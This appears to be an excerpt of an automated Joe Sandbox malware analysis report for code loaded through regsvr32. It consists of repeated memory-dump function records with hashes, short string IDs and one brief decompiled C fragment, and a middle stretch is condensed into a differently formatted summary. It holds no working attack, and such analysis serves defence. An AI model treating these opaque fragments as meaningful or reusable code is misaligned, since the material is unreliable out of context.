                                                                                                  • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                  • Instruction Fuzzy Hash: 0A51E3B190030A8FDB48CF68D48A5DE7FF1FB68388F204219F856A6250D37486A4CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !oW!$ke&Q
                                                                                                  • API String ID: 0-419570616
                                                                                                  • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                  • Instruction ID: ea1fea907f003ec39065cca17086209c5a0045853850d007fe7306172111a287
                                                                                                  • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                  • Instruction Fuzzy Hash: E651D5B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ?j|$P
                                                                                                  • API String ID: 0-615948335
                                                                                                  • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                  • Instruction ID: 5d6b8457f22b7aeef96ca591b9514609f58a3be980f097f4aa58880e0d1c3f40
                                                                                                  • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                  • Instruction Fuzzy Hash: 8041C2B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6290D77896A4CFD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$aI
                                                                                                  • API String ID: 0-3604358270
                                                                                                  • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                  • Instruction ID: c2b7ca26b83d37642b34782f4552d2140b44291c255b6ad354f626828fd5b7eb
                                                                                                  • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                  • Instruction Fuzzy Hash: AA41C6B190038A8BCB48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: j$[
                                                                                                  • API String ID: 0-3696242357
                                                                                                  • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                  • Instruction ID: 0ed4813b92bf08dccb37755c41c9486f6d2ab62242612dfd31a4f73770ef5b5a
                                                                                                  • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                  • Instruction Fuzzy Hash: 9441D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: + $S"
                                                                                                  • API String ID: 0-2880694137
                                                                                                  • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                  • Instruction ID: 6a5eddef56a812f58850962cc10ef5e6696074e45e4a85b9a6a5b599be3fcf1f
                                                                                                  • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                  • Instruction Fuzzy Hash: 2B51C6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE866A6290D3B8D665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: =K$d%
                                                                                                  • API String ID: 0-2790768846
                                                                                                  • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                  • Instruction ID: 0dc017c67e9e86b321d881c813cac6932b9d1dd252a2f315400d570117909b50
                                                                                                  • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                  • Instruction Fuzzy Hash: 3041E5B090074E8BDF48CF64C88A5DE7BF0FB58358F10461DE86AA6290D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #|$`
                                                                                                  • API String ID: 0-1687004633
                                                                                                  • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                  • Instruction ID: a5d9d39096a2b8e3398ea37e645684fd74e0f8b1aafd5a7a661dabf6bee3125e
                                                                                                  • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                  • Instruction Fuzzy Hash: 6441D6B190078E8FDF48CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c$j~;
                                                                                                  • API String ID: 0-3832213246
                                                                                                  • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                  • Instruction ID: 2891536f61712a9e720867533185c54058b70abb351bd4da9dcdb71689e3236f
                                                                                                  • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                  • Instruction Fuzzy Hash: 0C41A5B080078E8FDB88DF64D88A1DF7BB0FB54358F104A19EC66A6250D3B49661CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -h$W
                                                                                                  • API String ID: 0-4146498651
                                                                                                  • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                  • Instruction ID: 3e91ad1ec085e6ba314545160cd07976664f79b4e5d459ef0d7dea1dbd01ebb4
                                                                                                  • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                  • Instruction Fuzzy Hash: C441B4B590038E9FDB44CF68D88A5CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$fp
                                                                                                  • API String ID: 0-3298127435
                                                                                                  • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                  • Instruction ID: 84d9223998ba9d1bc7df529e5fd07d2193f20b8d904377b249322ca08510e6ab
                                                                                                  • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                  • Instruction Fuzzy Hash: 2241F5B190470E8BDB48CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$Zs
                                                                                                  • API String ID: 0-3922668666
                                                                                                  • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                  • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                  • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                  • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: XW$s [
                                                                                                  • API String ID: 0-2366283936
                                                                                                  • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                  • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                  • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                  • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4V$jn(
                                                                                                  • API String ID: 0-2529302498
                                                                                                  • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                  • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                  • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                  • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: '$%6
                                                                                                  • API String ID: 0-1852427169
                                                                                                  • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                  • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                  • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                  • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: uS$J
                                                                                                  • API String ID: 0-437994327
                                                                                                  • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                  • Instruction ID: fcac9b6946fcf1091511992b080734b663e6d98eca3396f6c51bc1604994ab08
                                                                                                  • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                  • Instruction Fuzzy Hash: 4331D8B190034E8FDB84CF64C8865DE7FB0FF28358F104619E859A62A0D3B88695CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: +@$`.P
                                                                                                  • API String ID: 0-1189405855
                                                                                                  • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                  • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                  • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                  • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^$R
                                                                                                  • API String ID: 0-3595634639
                                                                                                  • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                  • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                  • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                  • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: t^$w
                                                                                                  • API String ID: 0-1486493484
                                                                                                  • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                  • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                  • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                  • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-606707520
                                                                                                  • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                  • Instruction ID: 83764233260160376bc5218f555d84fcd5c49e0509acde5e25885a84154386cc
                                                                                                  • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                  • Instruction Fuzzy Hash: 17222870914709EFDB58DFA8C45A4DEBBF1FF44348F4081ADE80AAB290D7749A19CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                  				signed long long _t25;
                                                                                                  				void* _t27;
                                                                                                  				void* _t30;
                                                                                                  
                                                                                                  				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                  				 *(_t30 + 0x10) = _t25;
                                                                                                  				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                  				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                  				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
                                                                                                  				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
                                                                                                  				return __rdx + 0xb;
                                                                                                  			}

                                                                                                  Listing addresses: 0x180008d28, 0x180008d2d, 0x180008d32, 0x180008d56, 0x180008d5d, 0x180008d70, 0x180008d91

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
• API String ID:
• Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
• Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
• Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
• Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
Uniqueness Score: -1.00%

Strings (fifteen further function records)

All fifteen records below come from the same memory dump and share the following fields, listed once here instead of being repeated per record:
• Memory Dump Source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
• Yara matches: none listed
• API ID: empty for every record, and every API String ID begins with 0-
• Opcode Fuzzy Hash: identical to the Opcode ID in every record
• Uniqueness Score: -1.00% for every record

• String ID: ef
• API String ID: 0-3522424648
• Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
• Instruction ID: 34d702f7a54826ebb142bfc54a51c7274cafc2ead3a6666deeb441bb36e81001
• Instruction Fuzzy Hash: 04021870A04709EFDB58DF68C08959EBBF2FB44308F00816DE84AAB364D775DA55CB85

• String ID: x]!-
• API String ID: 0-585868058
• Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
• Instruction ID: d1b53f8bad76e3f0b54258a0aa0bb0548c996c0e82691290fcb6144b64381ae4
• Instruction Fuzzy Hash: D9D199B1A0060DCFDBA8CF78C54A5DD7BF1FB48308F606129E826AA2B2D7749905CF54

• String ID: }^O
• API String ID: 0-3039680174
• Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
• Instruction ID: 5a2c455290808fb24b09691f4e6792f8e7dc3b8abdf1de58b2b9b499a8a5d520
• Instruction Fuzzy Hash: 13A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49

• String ID: RH
• API String ID: 0-2975065227
• Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
• Instruction ID: cdad1d91f480f66b27fdb659e84bc1119197df58d020f9e9c8444a22e040d48e
• Instruction Fuzzy Hash: 1E51267111C7448FC7A8DF18D4C66AAB7E0FB84310FA0991DE8CED7251DF74A88A8B46

• String ID: Y
• API String ID: 0-579211002
• Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
• Instruction ID: d41d8029bd9415da13f6bfbf0a834e7270de84c8394c3f2629202d7ce2768f0b
• Instruction Fuzzy Hash: C351F4716107898BDB58DF28C88A0DD3BA1FB4835CF125328FD8EA62A1D77CD845CB49

• String ID: vOs
• API String ID: 0-1852020951
• Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
• Instruction ID: 22b723e3a98742fb13970f999e98ad2b4648d71b89372cfc4eed7df4676e7da1
• Instruction Fuzzy Hash: C7618DB190030E8FDB49CF68D48A5CE7FB0FB64398F204519F845A6260D7B996A8CFD5

• String ID: *)
• API String ID: 0-1811957435
• Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
• Instruction ID: 078150d52184424dd17db31459f4485cad1c2882722b64f7b09285960e87cb87
• Instruction Fuzzy Hash: 3931937061CB888FC728DF29D09556AB7E0FB99305F504A2EE58AC73A5DB70D805CB82

• String ID: t
• API String ID: 0-1935021737
• Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
• Instruction ID: f6c2332ea375e92e06b9f1baf38f9d76ac49519429e2fd2d76d7fd3f3ab394f0
• Instruction Fuzzy Hash: 6C319F3021DB448FE768DF2CD48516ABBE0FB9A344F104A6DE5CAC72A6D770D845CB92

• String ID: __
• API String ID: 0-2267946753
• Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
• Instruction ID: 2c54f3c3d851db41155cbd174530d31bf845b6f79ced918ab57b032fec3a7dcb
• Instruction Fuzzy Hash: 0D41F070608B848BE758DF29C18A41BBBF1FBC9304F500A2DF69A873A0C775D845CB42

• String ID: GSn
• API String ID: 0-1733515909
• Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
• Instruction ID: 82bbc0c32179f28186132ef6e82abdd229f1f6dcc598f6c72a47a27dfe89b96e
• Instruction Fuzzy Hash: AB51D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84

• String ID: 8=
• API String ID: 0-237953557
• Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
• Instruction ID: 440091aa21e685a2cd1a416f66003a4d9d7146c3ae9efea191104d73c3fbf966
• Instruction Fuzzy Hash: 3C314930248B458BDB5CDF2CD49922ABAE1FBD9300F444A2EF58AD7365DB34D845CB82

• String ID: K
• API String ID: 0-425913083
• Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
• Instruction ID: b9744f830faa122e33d926d1cd684c9f58c4eebd53e4149b8ee7128ee311117b
• Instruction Fuzzy Hash: 7441F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19F866A6250D3B8D665CF85

• String ID: t"
• API String ID: 0-2131657386
• Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
• Instruction ID: c55ae59100a6322aaed63c996446cbe2473037fb48fb65175a7ca83762f94da7
• Instruction Fuzzy Hash: C841C87190070D8BDF48DF64C48A4DE7FB0FB483A8F65621DE81AB6290D3B89585CF99

• String ID: gLv
• API String ID: 0-1669999040
• Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
• Instruction ID: 092b6deffca3b355bffda5ffade617cc78189e10090e0f8a8cf153ca2a89f312
• Instruction Fuzzy Hash: B341A2B190078E8FDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF95

• String ID: 2|
• API String ID: 0-4112153497
• Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
• Instruction ID: b91563c65c8b91ec1f09e45b36dfecdf79931471c94428db7a4d2612f3b8b467
• Instruction Fuzzy Hash: DF31E2715083808FD768DF28C58A55BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: v)v
                                                                                                  • API String ID: 0-2248367734
                                                                                                  • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                  • Instruction ID: fbb4d913276c301713800a5f8b94e3e4e5a6bc2592369a311f958d50d0dfcb0b
                                                                                                  • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                                  • Instruction Fuzzy Hash: 2531FFB0D107189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7785A45CF68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
